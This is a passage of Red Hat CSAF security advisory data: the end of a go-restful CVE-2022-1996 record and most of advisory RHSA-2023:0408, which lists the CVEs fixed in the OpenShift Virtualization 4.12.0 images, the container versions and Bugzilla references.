"8Base-CNV-4.10:container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", "8Base-CNV-4.10:container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", "8Base-CNV-4.10:container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", "8Base-CNV-4.10:container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", "8Base-CNV-4.10:container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", "8Base-CNV-4.10:container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-1996", }, { category: "external", summary: "RHBZ#2094982", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094982", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-1996", url: "https://www.cve.org/CVERecord?id=CVE-2022-1996", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-1996", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-1996", }, ], release_date: "2022-06-08T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-06T14:00:38+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6351", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 9.1, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", version: "3.1", }, products: [ "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", "8Base-CNV-4.10:container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "go-restful: Authorization Bypass Through User-Controlled Key", }, ], }
rhsa-2023_0408
Vulnerability from csaf_redhat
Published
2023-01-25 11:11
Modified
2025-01-06 19:22
Summary
Red Hat Security Advisory: OpenShift Virtualization 4.12.0 Images security update
Notes
Topic
Red Hat OpenShift Virtualization release 4.12 is now available with updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. This advisory contains the following OpenShift Virtualization 4.12.0 images:
Security Fix(es):
* golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)
* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
* golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)
* golang: syscall: don't close fd 0 on ForkExec error (CVE-2021-44717)
* golang: net/http: improper sanitization of Transfer-Encoding header (CVE-2022-1705)
* golang: go/parser: stack exhaustion in all Parse* functions (CVE-2022-1962)
* golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772)
* golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773)
* golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806)
* golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)
* golang: syscall: faccessat checks wrong group (CVE-2022-29526)
* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)
* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)
* golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)
* golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)
* golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)
* golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working (CVE-2022-32148)
* golang: crypto/tls: session tickets lack random ticket_age_add (CVE-2022-30629)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
RHEL-8-CNV-4.12
==============
bridge-marker-container-v4.12.0-24
cluster-network-addons-operator-container-v4.12.0-24
cnv-containernetworking-plugins-container-v4.12.0-24
cnv-must-gather-container-v4.12.0-58
hco-bundle-registry-container-v4.12.0-769
hostpath-csi-driver-container-v4.12.0-30
hostpath-provisioner-container-v4.12.0-30
hostpath-provisioner-operator-container-v4.12.0-31
hyperconverged-cluster-operator-container-v4.12.0-96
hyperconverged-cluster-webhook-container-v4.12.0-96
kubemacpool-container-v4.12.0-24
kubevirt-console-plugin-container-v4.12.0-182
kubevirt-ssp-operator-container-v4.12.0-64
kubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55
kubevirt-tekton-tasks-copy-template-container-v4.12.0-55
kubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55
kubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55
kubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55
kubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55
kubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55
kubevirt-tekton-tasks-operator-container-v4.12.0-40
kubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55
kubevirt-template-validator-container-v4.12.0-32
libguestfs-tools-container-v4.12.0-255
ovs-cni-marker-container-v4.12.0-24
ovs-cni-plugin-container-v4.12.0-24
virt-api-container-v4.12.0-255
virt-artifacts-server-container-v4.12.0-255
virt-cdi-apiserver-container-v4.12.0-72
virt-cdi-cloner-container-v4.12.0-72
virt-cdi-controller-container-v4.12.0-72
virt-cdi-importer-container-v4.12.0-72
virt-cdi-operator-container-v4.12.0-72
virt-cdi-uploadproxy-container-v4.12.0-71
virt-cdi-uploadserver-container-v4.12.0-72
virt-controller-container-v4.12.0-255
virt-exportproxy-container-v4.12.0-255
virt-exportserver-container-v4.12.0-255
virt-handler-container-v4.12.0-255
virt-launcher-container-v4.12.0-255
virt-operator-container-v4.12.0-255
virtio-win-container-v4.12.0-10
vm-network-latency-checkup-container-v4.12.0-89
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Red Hat OpenShift Virtualization release 4.12 is now available with updates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. This advisory contains the following OpenShift Virtualization 4.12.0 images:\n\nSecurity Fix(es):\n\n* golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\n* golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)\n\n* golang: syscall: don't close fd 0 on ForkExec error (CVE-2021-44717)\n\n* golang: net/http: improper sanitization of Transfer-Encoding header (CVE-2022-1705)\n\n* golang: go/parser: stack exhaustion in all Parse* functions (CVE-2022-1962)\n\n* golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772)\n\n* golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773)\n\n* golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806)\n\n* golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)\n\n* golang: syscall: faccessat checks wrong group (CVE-2022-29526)\n\n* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)\n\n* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)\n\n* golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)\n\n* golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)\n\n* golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)\n\n* golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working (CVE-2022-32148)\n\n* golang: crypto/tls: session tickets lack random ticket_age_add (CVE-2022-30629)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nRHEL-8-CNV-4.12\n\n==============\n\nbridge-marker-container-v4.12.0-24\ncluster-network-addons-operator-container-v4.12.0-24\ncnv-containernetworking-plugins-container-v4.12.0-24\ncnv-must-gather-container-v4.12.0-58\nhco-bundle-registry-container-v4.12.0-769\nhostpath-csi-driver-container-v4.12.0-30\nhostpath-provisioner-container-v4.12.0-30\nhostpath-provisioner-operator-container-v4.12.0-31\nhyperconverged-cluster-operator-container-v4.12.0-96\nhyperconverged-cluster-webhook-container-v4.12.0-96\nkubemacpool-container-v4.12.0-24\nkubevirt-console-plugin-container-v4.12.0-182\nkubevirt-ssp-operator-container-v4.12.0-64\nkubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55\nkubevirt-tekton-tasks-copy-template-container-v4.12.0-55\nkubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55\nkubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55\nkubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55\nkubevirt-tekton-tasks-operator-container-v4.12.0-40\nkubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55\nkubevirt-template-validator-container-v4.12.0-32\nlibguestfs-tools-container-v4.12.0-255\novs-cni-marker-container-v4.12.0-24\novs-cni-plugin-container-v4.12.0-24\nvirt-api-container-v4.12.0-255\nvirt-artifacts-server-container-v4.12.0-255\nvirt-cdi-apiserver-container-v4.12.0-72\nvirt-cdi-cloner-container-v4.12.0-72\nvirt-cdi-controller-container-v4.12.0-72\nvirt-cdi-importer-container-v4.12.0-72\nvirt-cdi-operator-container-v4.12.0-72\nvirt-cdi-uploadproxy-container-v4.12.0-71\nvirt-cdi-uploadserver-container-v4.12.0-72\nvirt-controller-container-v4.12.0-255\nvirt-exportproxy-container-v4.12.0-255\nvirt-exportserver-container-v4.12.0-255\nvirt-handler-container-v4.12.0-255\nvirt-launcher-container-v4.12.0-255\nvirt-operator-container-v4.12.0-255\nvirtio-win-container-v4.12.0-10\nvm-network-latency-checkup-container-v4.12.0-89", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2023:0408", url: "https://access.redhat.com/errata/RHSA-2023:0408", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "1719190", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1719190", }, { category: "external", summary: "2023393", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2023393", }, { category: "external", summary: "2030801", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2030801", }, { category: "external", summary: "2030806", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2030806", }, { category: "external", summary: "2040377", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2040377", }, { category: "external", summary: "2046298", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2046298", }, { category: "external", summary: "2052556", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2052556", }, { category: "external", summary: "2053429", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053429", }, { category: "external", summary: "2053532", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053532", }, { category: "external", summary: "2053541", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053541", }, { category: "external", summary: "2060499", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2060499", }, { category: "external", summary: "2069098", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2069098", }, { category: "external", summary: "2070366", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2070366", }, { category: "external", summary: "2071491", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2071491", }, { category: "external", summary: "2072797", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2072797", }, { category: "external", summary: "2072821", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2072821", }, { category: "external", summary: "2079916", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2079916", }, { category: "external", summary: "2084085", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084085", }, { category: "external", summary: "2086285", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086285", }, { category: "external", summary: "2086551", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086551", }, { category: "external", summary: "2087724", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087724", }, { category: "external", summary: "2088129", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088129", }, { category: "external", summary: "2088464", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088464", }, { category: "external", summary: "2089391", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089391", }, { category: "external", summary: "2089744", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089744", }, { category: "external", summary: "2089751", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089751", }, { category: "external", summary: "2089804", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089804", }, { category: "external", summary: "2091856", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091856", }, { category: "external", summary: "2092793", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092793", }, { category: "external", summary: "2092796", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092796", }, { category: "external", summary: "2093771", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093771", }, { category: "external", summary: "2093996", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093996", }, { category: "external", summary: "2094202", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094202", }, { category: "external", summary: "2096285", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096285", }, { category: "external", summary: "2096780", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096780", }, { category: "external", summary: "2097436", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2097436", }, { category: "external", summary: "2097586", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2097586", }, { category: "external", summary: "2099556", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099556", }, { category: "external", summary: "2099573", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099573", }, { category: "external", summary: "2099923", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099923", }, { category: "external", summary: "2100290", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100290", }, { category: "external", summary: "2100436", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100436", }, { category: "external", summary: "2100442", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100442", }, { category: "external", summary: "2100495", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100495", }, { category: "external", summary: "2100629", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100629", }, { category: "external", summary: "2100679", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100679", }, { category: "external", summary: "2100682", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100682", }, { category: "external", summary: "2100684", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100684", }, { category: "external", summary: "2101144", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101144", }, { category: "external", summary: "2101164", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101164", }, { category: "external", summary: "2101167", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101167", }, { category: "external", summary: "2101333", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101333", }, { category: "external", summary: "2101335", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101335", }, { category: "external", summary: "2101390", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101390", }, { category: "external", summary: "2101394", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101394", }, { category: "external", summary: "2101423", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101423", }, { category: "external", summary: "2101430", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101430", }, { category: "external", summary: "2101445", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101445", }, { category: "external", summary: "2101454", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101454", }, { category: "external", summary: "2101499", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101499", }, { category: "external", summary: "2101501", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101501", }, { category: "external", summary: "2101628", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101628", }, { category: "external", summary: "2101667", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101667", }, { category: "external", summary: "2101681", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101681", }, { category: "external", summary: "2102074", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102074", }, { category: "external", summary: "2102125", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102125", }, { category: "external", summary: "2102132", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102132", }, { category: "external", summary: "2102138", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102138", }, { category: "external", summary: "2102256", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102256", }, { category: "external", summary: "2102448", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102448", }, { category: "external", summary: "2102475", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102475", }, { category: "external", summary: "2102561", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102561", }, { category: "external", summary: "2102737", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102737", }, { category: "external", summary: "2102740", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102740", }, { category: "external", summary: "2103806", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2103806", }, { category: "external", summary: "2103807", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2103807", }, { category: "external", summary: "2103817", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2103817", }, { category: "external", summary: "2103844", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2103844", }, { category: "external", summary: "2104331", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104331", }, { category: "external", summary: "2104402", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104402", }, { category: "external", summary: "2104422", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104422", }, { category: "external", summary: "2104424", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104424", }, { category: "external", summary: "2104479", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104479", }, { category: "external", summary: "2104480", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104480", }, { category: "external", summary: "2104785", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104785", }, { category: "external", summary: "2104859", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104859", }, { category: "external", summary: "2105257", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2105257", }, { category: "external", summary: "2106175", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2106175", }, { category: "external", summary: "2106963", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2106963", }, { category: "external", summary: "2107279", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107279", }, { category: "external", summary: "2107342", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", }, { category: "external", summary: "2107371", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { category: "external", summary: "2107374", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { category: "external", summary: "2107376", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", }, { category: "external", summary: "2107383", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { category: "external", summary: "2107386", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { category: "external", summary: "2107388", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { category: "external", summary: "2107390", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107390", }, { category: "external", summary: "2107392", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", }, { category: "external", summary: "2108339", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2108339", }, { category: "external", summary: "2108638", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2108638", }, { category: "external", summary: "2109818", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2109818", }, { category: "external", summary: "2109975", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2109975", }, { category: "external", summary: "2110256", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2110256", }, { category: "external", summary: "2110562", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2110562", }, { category: "external", summary: "2111240", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2111240", }, { category: "external", summary: "2111292", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2111292", }, { category: "external", summary: "2111328", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2111328", }, { category: "external", summary: "2111378", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2111378", }, { category: "external", summary: "2111744", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2111744", }, { category: "external", summary: "2111794", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2111794", }, { category: "external", summary: "2112900", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2112900", }, { category: "external", summary: "2114516", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2114516", }, { category: "external", summary: "2114636", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2114636", }, { category: "external", summary: "2114683", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2114683", }, { category: "external", summary: "2115257", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2115257", }, { category: "external", summary: "2115258", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2115258", }, { category: "external", summary: "2115280", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2115280", }, { category: "external", summary: "2115769", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2115769", }, { category: "external", summary: "2116225", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2116225", }, { category: "external", summary: "2116644", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2116644", }, { category: "external", summary: "2117549", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117549", }, { category: "external", summary: "2117803", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117803", }, { category: "external", summary: "2117813", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117813", }, { category: "external", summary: "2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "external", summary: "2118257", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2118257", }, { category: "external", summary: "2118823", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2118823", }, { category: "external", summary: "2119069", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2119069", }, { category: "external", summary: "2119128", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2119128", }, { category: "external", summary: "2119309", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2119309", }, { category: "external", summary: "2119615", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2119615", }, { category: "external", summary: "2120907", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2120907", }, { category: "external", summary: "2121320", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2121320", }, { category: "external", summary: "2122236", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2122236", }, { category: "external", summary: "2122990", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2122990", }, { category: "external", summary: "2124147", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124147", }, { category: "external", summary: "2124307", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124307", }, { category: "external", summary: "2124528", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124528", }, { category: "external", summary: "2124555", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124555", }, { category: "external", summary: "2124557", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124557", }, { category: "external", summary: "2124558", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124558", }, { category: "external", summary: "2124565", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124565", }, { category: "external", summary: "2124572", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124572", }, { category: "external", summary: "2124582", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124582", }, { category: "external", summary: "2124594", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124594", }, { category: "external", summary: "2124597", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2124597", }, { category: "external", summary: "2126104", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2126104", }, { category: "external", summary: "2126397", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2126397", }, { category: "external", summary: "2127787", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2127787", }, { category: "external", summary: "2127843", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2127843", }, { category: "external", summary: "2127931", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2127931", }, { category: "external", summary: "2127947", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2127947", }, { category: "external", summary: "2128002", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2128002", }, { category: "external", summary: 